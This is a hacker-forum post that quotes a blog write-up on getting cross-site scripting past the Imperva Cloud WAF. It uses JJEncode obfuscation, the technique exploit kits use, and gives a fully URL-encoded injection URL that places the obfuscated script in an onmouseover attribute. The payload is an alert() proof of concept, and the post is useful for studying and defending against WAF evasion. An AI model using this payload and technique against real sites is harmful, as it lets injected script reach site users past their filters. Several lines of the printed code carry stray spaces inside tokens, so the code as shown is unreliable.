Welcome!

Welcome to the 1337pwn community forums. Register now for an account.

Registration is free!

Register Now

Announcement

Collapse
No announcement yet.

Imperva Cloud WAF Bypass

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    Imperva Cloud WAF Bypass

    https://techanarchy.net/blog/imperva-waf-bypass

    Fortunatly, for me at least. I had seen this technique before. JJEncode and JS Fuck were techniques I had seen used by exploit Kits to obfuscate javascript payloads and redirect chains to hinder analysis and try to evade detection engines.

    JJEncode and JSFuck take your javascript you want to execute and from that creates valid javascript code that uses no Alpha or Numeric characters instead it uses a set of symbols.


    Taking a look at the example below we take a simple javascript line

    Code:
    alert("Hello, JavaScript" )
    Code:
    $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+" ")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__ $+$.__$+$.___+$.$$$_+(![]+"")[$._$_]+(![]+"")[$._$_]+$._$+",\\"+$.$__+$.___+"\\"+$.__$+$.__$+$._$_+$.$ _$_+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$._$_ +$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$. $_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\\"\\"+$.$ __+$.___+")"+"\"")())();
    How this is valid javascript I assume is black magic, but it works.

    I throw this in to the onmousover HTML tag and . . .
    I hit the WAF again.

    One more try this time I took the jjencoded output switch and ran a simple URL encode. This gave me a really ugly URL.

    Code:
    https://shenanigans/search?search=%3E%3C/span%3E%3Cp%20onmouseover=%27p%3D%7E%5B%5D%3Bp%3D% 7B%5F%5F%5F%3A%2B%2Bp%2C%24%24%24%24%3A%28%21%5B%5 D%2B%22%22%29%5Bp%5D%2C%5F%5F%24%3A%2B%2Bp%2C%24%5 F%24%5F%3A%28%21%5B%5D%2B%22%22%29%5Bp%5D%2C%5F%24 %5F%3A%2B%2Bp%2C%24%5F%24%24%3A%28%7B%7D%2B%22%22% 29%5Bp%5D%2C%24%24%5F%24%3A%28p%5Bp%5D%2B%22%22%29 %5Bp%5D%2C%5F%24%24%3A%2B%2Bp%2C%24%24%24%5F%3A%28 %21%22%22%2B%22%22%29%5Bp%5D%2C%24%5F%5F%3A%2B%2Bp %2C%24%5F%24%3A%2B%2Bp%2C%24%24%5F%5F%3A%28%7B%7D% 2B%22%22%29%5Bp%5D%2C%24%24%5F%3A%2B%2Bp%2C%24%24% 24%3A%2B%2Bp%2C%24%5F%5F%5F%3A%2B%2Bp%2C%24%5F%5F% 24%3A%2B%2Bp%7D%3Bp%2E%24%5F%3D%28p%2E%24%5F%3Dp%2 B%22%22%29%5Bp%2E%24%5F%24%5D%2B%28p%2E%5F%24%3Dp% 2E%24%5F%5Bp%2E%5F%5F%24%5D%29%2B%28p%2E%24%24%3D% 28p%2E%24%2B%22%22%29%5Bp%2E%5F%5F%24%5D%29%2B%28% 28%21p%29%2B%22%22%29%5Bp%2E%5F%24%24%5D%2B%28p%2E %5F%5F%3Dp%2E%24%5F%5Bp%2E%24%24%5F%5D%29%2B%28p%2 E%24%3D%28%21%22%22%2B%22%22%29%5Bp%2E%5F%5F%24%5D %29%2B%28p%2E%5F%3D%28%21%22%22%2B%22%22%29%5Bp%2E %5F%24%5F%5D%29%2Bp%2E%24%5F%5Bp%2E%24%5F%24%5D%2B p%2E%5F%5F%2Bp%2E%5F%24%2Bp%2E%24%3Bp%2E%24%24%3Dp %2E%24%2B%28%21%22%22%2B%22%22%29%5Bp%2E%5F%24%24% 5D%2Bp%2E%5F%5F%2Bp%2E%5F%2Bp%2E%24%2Bp%2E%24%24%3 Bp%2E%24%3D%28p%2E%5F%5F%5F%29%5Bp%2E%24%5F%5D%5Bp %2E%24%5F%5D%3Bp%2E%24%28p%2E%24%28p%2E%24%24%2B%2 2%5C%22%22%2Bp%2E%24%5F%24%5F%2B%28%21%5B%5D%2B%22 %22%29%5Bp%2E%5F%24%5F%5D%2Bp%2E%24%24%24%5F%2B%22 %5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5 F%24%5F%2Bp%2E%5F%5F%2B%22%28%5C%5C%5C%22%5C%5C%22 %2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%24%2Bp%2E%5F%5F%5F%2 Bp%2E%24%24%24%5F%2B%28%21%5B%5D%2B%22%22%29%5Bp%2 E%5F%24%5F%5D%2B%28%21%5B%5D%2B%22%22%29%5Bp%2E%5F %24%5F%5D%2Bp%2E%5F%24%2B%22%2C%5C%5C%22%2Bp%2E%24 %5F%5F%2Bp%2E%5F%5F%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F %24%2Bp%2E%5F%5F%24%2Bp%2E%5F%24%5F%2Bp%2E%24%5F%2 4%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5 F%2Bp%2E%24%24%5F%2Bp%2E%24%5F%24%5F%2B%22%5C%5C%2 2%2Bp%2E%5F%5F%24%2Bp%2E%5F%24%5F%2Bp%2E%5F%24%24% 2Bp%2E%24%24%5F%5F%2B%22%5C%5C%22%2Bp%2E%5F%5F%24% 2Bp%2E%24%24%5F%2Bp%2E%5F%24%5F%2B%22%5C%5C%22%2Bp %2E%5F%5F%24%2Bp%2E%24%5F%24%2Bp%2E%5F%5F%24%2B%22 %5C%5C%22%2Bp%2E%5F%5F%24%2Bp%2E%24%24%5F%2Bp%2E%5 F%5F%5F%2Bp%2E%5F%5F%2B%22%5C%5C%5C%22%5C%5C%22%2B p%2E%24%5F%5F%2Bp%2E%5F%5F%5F%2B%22%29%22%2B%22%5C %22%22%29%28%29%29%28%29%3B%27%3E
Working...
X